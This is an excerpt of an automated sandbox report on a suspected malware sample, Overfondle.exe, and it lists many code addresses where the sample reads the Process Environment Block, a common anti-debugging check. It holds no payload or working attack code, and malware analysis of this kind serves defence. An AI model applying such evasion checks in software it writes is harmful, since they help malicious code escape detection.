        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051A49A mov eax, dword ptr fs:[00000030h]8_2_2051A49A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204664AB mov eax, dword ptr fs:[00000030h]8_2_204664AB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204944B0 mov ecx, dword ptr fs:[00000030h]8_2_204944B0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EA4B0 mov eax, dword ptr fs:[00000030h]8_2_204EA4B0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468550 mov eax, dword ptr fs:[00000030h]8_2_20468550
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468550 mov eax, dword ptr fs:[00000030h]8_2_20468550
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049656A mov eax, dword ptr fs:[00000030h]8_2_2049656A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049656A mov eax, dword ptr fs:[00000030h]8_2_2049656A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049656A mov eax, dword ptr fs:[00000030h]8_2_2049656A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6500 mov eax, dword ptr fs:[00000030h]8_2_204F6500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534500 mov eax, dword ptr fs:[00000030h]8_2_20534500
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470535 mov eax, dword ptr fs:[00000030h]8_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h]8_2_2048E53E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E5CF mov eax, dword ptr fs:[00000030h]8_2_2049E5CF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E5CF mov eax, dword ptr fs:[00000030h]8_2_2049E5CF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204665D0 mov eax, dword ptr fs:[00000030h]8_2_204665D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A5D0 mov eax, dword ptr fs:[00000030h]8_2_2049A5D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A5D0 mov eax, dword ptr fs:[00000030h]8_2_2049A5D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C5ED mov eax, dword ptr fs:[00000030h]8_2_2049C5ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C5ED mov eax, dword ptr fs:[00000030h]8_2_2049C5ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204625E0 mov eax, dword ptr fs:[00000030h]8_2_204625E0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h]8_2_2048E5E7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20494588 mov eax, dword ptr fs:[00000030h]8_2_20494588
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20462582 mov eax, dword ptr fs:[00000030h]8_2_20462582
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20462582 mov ecx, dword ptr fs:[00000030h]8_2_20462582
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E59C mov eax, dword ptr fs:[00000030h]8_2_2049E59C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h]8_2_204E05A7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h]8_2_204E05A7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h]8_2_204E05A7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204845B1 mov eax, dword ptr fs:[00000030h]8_2_204845B1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204845B1 mov eax, dword ptr fs:[00000030h]8_2_204845B1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047C640 mov eax, dword ptr fs:[00000030h]8_2_2047C640
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A660 mov eax, dword ptr fs:[00000030h]8_2_2049A660
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A660 mov eax, dword ptr fs:[00000030h]8_2_2049A660
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052866E mov eax, dword ptr fs:[00000030h]8_2_2052866E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052866E mov eax, dword ptr fs:[00000030h]8_2_2052866E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20492674 mov eax, dword ptr fs:[00000030h]8_2_20492674
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE609 mov eax, dword ptr fs:[00000030h]8_2_204DE609
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047260B mov eax, dword ptr fs:[00000030h]8_2_2047260B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2619 mov eax, dword ptr fs:[00000030h]8_2_204A2619
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E627 mov eax, dword ptr fs:[00000030h]8_2_2047E627
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20496620 mov eax, dword ptr fs:[00000030h]8_2_20496620
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20498620 mov eax, dword ptr fs:[00000030h]8_2_20498620
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046262C mov eax, dword ptr fs:[00000030h]8_2_2046262C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A6C7 mov ebx, dword ptr fs:[00000030h]8_2_2049A6C7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A6C7 mov eax, dword ptr fs:[00000030h]8_2_2049A6C7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h]8_2_204DE6F2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h]8_2_204DE6F2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h]8_2_204DE6F2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h]8_2_204DE6F2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E06F1 mov eax, dword ptr fs:[00000030h]8_2_204E06F1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E06F1 mov eax, dword ptr fs:[00000030h]8_2_204E06F1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464690 mov eax, dword ptr fs:[00000030h]8_2_20464690
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464690 mov eax, dword ptr fs:[00000030h]8_2_20464690
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C6A6 mov eax, dword ptr fs:[00000030h]8_2_2049C6A6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204966B0 mov eax, dword ptr fs:[00000030h]8_2_204966B0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049674D mov esi, dword ptr fs:[00000030h]8_2_2049674D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049674D mov eax, dword ptr fs:[00000030h]8_2_2049674D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049674D mov eax, dword ptr fs:[00000030h]8_2_2049674D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE75D mov eax, dword ptr fs:[00000030h]8_2_204EE75D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460750 mov eax, dword ptr fs:[00000030h]8_2_20460750
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2750 mov eax, dword ptr fs:[00000030h]8_2_204A2750
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2750 mov eax, dword ptr fs:[00000030h]8_2_204A2750
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E4755 mov eax, dword ptr fs:[00000030h]8_2_204E4755
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468770 mov eax, dword ptr fs:[00000030h]8_2_20468770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470770 mov eax, dword ptr fs:[00000030h]8_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C700 mov eax, dword ptr fs:[00000030h]8_2_2049C700
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460710 mov eax, dword ptr fs:[00000030h]8_2_20460710
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20490710 mov eax, dword ptr fs:[00000030h]8_2_20490710
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C720 mov eax, dword ptr fs:[00000030h]8_2_2049C720
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C720 mov eax, dword ptr fs:[00000030h]8_2_2049C720
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049273C mov eax, dword ptr fs:[00000030h]8_2_2049273C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049273C mov ecx, dword ptr fs:[00000030h]8_2_2049273C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049273C mov eax, dword ptr fs:[00000030h]8_2_2049273C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DC730 mov eax, dword ptr fs:[00000030h]8_2_204DC730
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046C7C0 mov eax, dword ptr fs:[00000030h]8_2_2046C7C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E07C3 mov eax, dword ptr fs:[00000030h]8_2_204E07C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204827ED mov eax, dword ptr fs:[00000030h]8_2_204827ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204827ED mov eax, dword ptr fs:[00000030h]8_2_204827ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204827ED mov eax, dword ptr fs:[00000030h]8_2_204827ED
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE7E1 mov eax, dword ptr fs:[00000030h]8_2_204EE7E1
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204647FB mov eax, dword ptr fs:[00000030h]8_2_204647FB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204647FB mov eax, dword ptr fs:[00000030h]8_2_204647FB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050678E mov eax, dword ptr fs:[00000030h]8_2_2050678E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204607AF mov eax, dword ptr fs:[00000030h]8_2_204607AF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205147A0 mov eax, dword ptr fs:[00000030h]8_2_205147A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20472840 mov ecx, dword ptr fs:[00000030h]8_2_20472840
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20490854 mov eax, dword ptr fs:[00000030h]8_2_20490854
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464859 mov eax, dword ptr fs:[00000030h]8_2_20464859
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20464859 mov eax, dword ptr fs:[00000030h]8_2_20464859
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE872 mov eax, dword ptr fs:[00000030h]8_2_204EE872
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE872 mov eax, dword ptr fs:[00000030h]8_2_204EE872
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6870 mov eax, dword ptr fs:[00000030h]8_2_204F6870
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6870 mov eax, dword ptr fs:[00000030h]8_2_204F6870
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC810 mov eax, dword ptr fs:[00000030h]8_2_204EC810
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050483A mov eax, dword ptr fs:[00000030h]8_2_2050483A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050483A mov eax, dword ptr fs:[00000030h]8_2_2050483A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049A830 mov eax, dword ptr fs:[00000030h]8_2_2049A830
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov ecx, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482835 mov eax, dword ptr fs:[00000030h]8_2_20482835
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048E8C0 mov eax, dword ptr fs:[00000030h]8_2_2048E8C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205308C0 mov eax, dword ptr fs:[00000030h]8_2_205308C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C8F9 mov eax, dword ptr fs:[00000030h]8_2_2049C8F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049C8F9 mov eax, dword ptr fs:[00000030h]8_2_2049C8F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052A8E4 mov eax, dword ptr fs:[00000030h]8_2_2052A8E4
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460887 mov eax, dword ptr fs:[00000030h]8_2_20460887
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC89D mov eax, dword ptr fs:[00000030h]8_2_204EC89D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E0946 mov eax, dword ptr fs:[00000030h]8_2_204E0946
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534940 mov eax, dword ptr fs:[00000030h]8_2_20534940
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E mov eax, dword ptr fs:[00000030h]8_2_204A096E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E mov edx, dword ptr fs:[00000030h]8_2_204A096E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E mov eax, dword ptr fs:[00000030h]8_2_204A096E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20504978 mov eax, dword ptr fs:[00000030h]8_2_20504978
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20504978 mov eax, dword ptr fs:[00000030h]8_2_20504978
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20486962 mov eax, dword ptr fs:[00000030h]8_2_20486962
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20486962 mov eax, dword ptr fs:[00000030h]8_2_20486962
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20486962 mov eax, dword ptr fs:[00000030h]8_2_20486962
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC97C mov eax, dword ptr fs:[00000030h]8_2_204EC97C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE908 mov eax, dword ptr fs:[00000030h]8_2_204DE908
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DE908 mov eax, dword ptr fs:[00000030h]8_2_204DE908
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EC912 mov eax, dword ptr fs:[00000030h]8_2_204EC912
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20458918 mov eax, dword ptr fs:[00000030h]8_2_20458918
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20458918 mov eax, dword ptr fs:[00000030h]8_2_20458918
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E892A mov eax, dword ptr fs:[00000030h]8_2_204E892A
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F892B mov eax, dword ptr fs:[00000030h]8_2_204F892B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052A9D3 mov eax, dword ptr fs:[00000030h]8_2_2052A9D3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F69C0 mov eax, dword ptr fs:[00000030h]8_2_204F69C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h]8_2_2046A9D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204949D0 mov eax, dword ptr fs:[00000030h]8_2_204949D0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EE9E0 mov eax, dword ptr fs:[00000030h]8_2_204EE9E0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204929F9 mov eax, dword ptr fs:[00000030h]8_2_204929F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204929F9 mov eax, dword ptr fs:[00000030h]8_2_204929F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204609AD mov eax, dword ptr fs:[00000030h]8_2_204609AD
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204609AD mov eax, dword ptr fs:[00000030h]8_2_204609AD
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E89B3 mov esi, dword ptr fs:[00000030h]8_2_204E89B3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E89B3 mov eax, dword ptr fs:[00000030h]8_2_204E89B3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E89B3 mov eax, dword ptr fs:[00000030h]8_2_204E89B3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]8_2_20466A50
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]8_2_20466A50
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]8_2_20466A50
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]8_2_20466A50
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]8_2_20466A50
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]8_2_20466A50
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]8_2_20466A50
